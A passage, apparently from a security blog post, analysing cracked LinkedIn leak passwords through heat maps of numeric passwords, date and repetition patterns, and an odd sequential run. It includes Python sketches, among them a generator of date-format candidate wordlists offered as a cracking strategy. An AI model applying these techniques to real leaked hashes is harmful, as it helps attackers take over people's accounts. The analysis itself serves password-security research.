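The 6% figure can be reproduced with a quick count of squares. This is a sketch that assumes the green and red areas are the simple rectangles spanned by days 01-31 and months 01-12 (so it includes impossible dates such as the 31st of a 30-day month); the variable names are illustrative.

```python
GRID_CELLS = 100 * 100

# DDMMYY: column = DD, row = MMYY // 100 = MM
ddmmyy_area = {(day, month) for day in range(1, 32) for month in range(1, 13)}

# MMDDYY: column = MM, row = DDYY // 100 = DD
mmddyy_area = {(month, day) for month in range(1, 13) for day in range(1, 32)}

# The two rectangles overlap where both values are between 01 and 12.
covered = ddmmyy_area | mmddyy_area
coverage = len(covered) / GRID_CELLS

print(len(ddmmyy_area), len(mmddyy_area), len(covered), coverage)
```

Each rectangle holds 372 squares, 144 of them are shared, and the union of 600 squares is exactly 6% of the 10,000 squares in the heat map.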

When a password specialist sees these patterns in the cracked list, the obvious next step is to generate a dictionary of dates written as more complex strings, like “November 4, 2011,” which would have been harder to crack in incremental mode. Several tens of thousands of passwords in that leak are indeed dates in various formats and languages.
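A date dictionary of that kind could be generated along the following lines. This is only a sketch: the set of formats is my own selection based on the patterns discussed above (plus the English long form), the function name is hypothetical, and a real dictionary would add more formats and languages.

```python
from datetime import date, timedelta

MONTHS = ["January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]

def date_candidates(start, end):
    """Yield several textual forms of every date from start to end (inclusive)."""
    day = start
    while day <= end:
        dd, mm = f"{day.day:02d}", f"{day.month:02d}"
        yy, yyyy = f"{day.year % 100:02d}", f"{day.year:04d}"
        yield dd + mm + yy        # DDMMYY
        yield mm + dd + yy        # MMDDYY
        yield yy + mm + dd        # YYMMDD
        yield dd + mm + yyyy      # DDMMYYYY
        yield yyyy + mm + dd      # YYYYMMDD
        yield f"{MONTHS[day.month - 1]} {day.day}, {yyyy}"   # e.g. November 4, 2011
        day += timedelta(days=1)

candidates = set(date_candidates(date(2011, 11, 1), date(2011, 11, 30)))
print("November 4, 2011" in candidates, "041111" in candidates)
```

Even with a wide range of years, such a dictionary stays tiny compared with an incremental search over strings of the same length.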

Spotting Password Singularities While Watching Numbers

It is also possible to represent 8-digit numeric passwords in a heat map, as shown below. The x-axis represents the first four digits from 0000 to 9999, and the y-axis represents the last four digits from 0000 to 9999. To keep the graphic to a reasonable size, we show a 200 x 200 pixel heat map, where each column represents a “window” of 50 prefixes and each row represents a “window” of 50 suffixes. Each pixel of the heat map then represents 2,500 (50 x 50) possible passwords.

Eight Digit Password Heat Map with Highlighted Regions

Again, the obvious diagonal pattern is any password chosen as a repetition of four decimal digits: 42154215, 36713671, etc. This is also a good pattern for cracking alphanumeric passwords: more than 19,000 passwords, e.g. abc1abc1, follow this pattern in the LinkedIn data.
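The 8-digit binning works the same way as the 6-digit one, just with windows on both axes. In the Python sketch below (cell_for_8 is a hypothetical helper, not the code used for the original figures), a password made of a repeated four-digit block always gets the same column and row, which is why the pattern shows up as a diagonal.

```python
WINDOW = 50   # prefixes per column and suffixes per row, giving a 200 x 200 grid

def cell_for_8(password, window=WINDOW):
    """Return (column, row) of the heat map for an 8-digit numeric password."""
    if len(password) != 8 or not (password.isascii() and password.isdigit()):
        raise ValueError("expected exactly eight digits")
    column = int(password[:4]) // window   # first four digits
    row = int(password[4:]) // window      # last four digits
    return column, row

passwords_per_pixel = WINDOW * WINDOW      # 2,500

for pw in ("42154215", "36713671"):
    column, row = cell_for_8(pw)
    print(pw, column, row, column == row)  # repeated blocks sit on the diagonal
```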

The yellow area displays every password of the format DDMMYYYY for each year from 1900 to 1999; the small green area shows every password of the format YYYYMMDD. These two little areas contain 25% of the 8-digit numeric passwords.

As I was looking at this heat map, I noticed an abnormal line in the upper right corner (the little pink box on the graphic). At first, I thought it was a 69xxxxxx pattern (users’ affinity for the number 69 is pointed out in a paper on customer-chosen banking PINs), but it wasn’t. After a closer look at the actual values from the cracked passwords, I found a weird, nearly complete sequential list of 423 numbers in the ranges 67108865 to 67108899 and 67109000 to 67109397. At the time of writing this post, I’m waiting for LinkedIn to confirm whether the accounts related to this range were automatically generated in some way.
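Once the heat map points at a suspicious spot, confirming a sequential range in the raw data is a simple scan. The sketch below is one possible way to do it, not the method I actually used; find_runs and its thresholds are hypothetical, and the sample list is synthetic data built from the two ranges quoted above (the real list had a few gaps, which is what the max_gap parameter is for).

```python
def find_runs(numbers, min_length=20, max_gap=1):
    """Return (first, last, count) for each run of values at most max_gap apart."""
    values = sorted(set(numbers))
    runs = []
    if not values:
        return runs
    start = prev = values[0]
    count = 1
    for value in values[1:]:
        if value - prev <= max_gap:
            prev = value
            count += 1
        else:
            if count >= min_length:
                runs.append((start, prev, count))
            start = prev = value
            count = 1
    if count >= min_length:
        runs.append((start, prev, count))
    return runs

# Synthetic sample: the two ranges from the text plus a few unrelated values.
sample = (list(range(67108865, 67108900)) + list(range(67109000, 67109398))
          + [12345678, 19851225, 90000000])

for first, last, count in find_runs(sample):
    print(first, last, count)
```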

Again, by focusing on the results of an easy incremental attack on the passwords, we can discover various strategies (word repetitions, date generation, etc.) that can be reused to crack tens of thousands more passwords, including strong ones, without using rainbow tables or a powerful CPU/GPU. At the same time, we find that passwords sometimes reveal secrets of their own (apart from the pure demographic analysis that could have been done on the birth dates of LinkedIn users), like that bizarrely long list of sequential numeric passwords.

New Questions

The obvious conclusion, which has been repeated many times elsewhere, is that humans are not good at generating secure passwords. No matter how clever we think we are, we always pick passwords based on some reasoning, like the dates or repetition patterns shown above, and that reasoning can be discerned and used to crack the password. Only truly random passwords are safe from this type of method.

Personally, I’m interested in the person(s) who stole and released the LinkedIn data. We are able to unveil information from the released password hashes. If the hashes that have been “marked” with five 0’s at their beginning are those already cracked by an initial hacker, I wonder whether someone could build a profile of this person by looking at the success rate of different cracking methods, such as rainbow tables, incremental mode, dictionary attacks and so forth.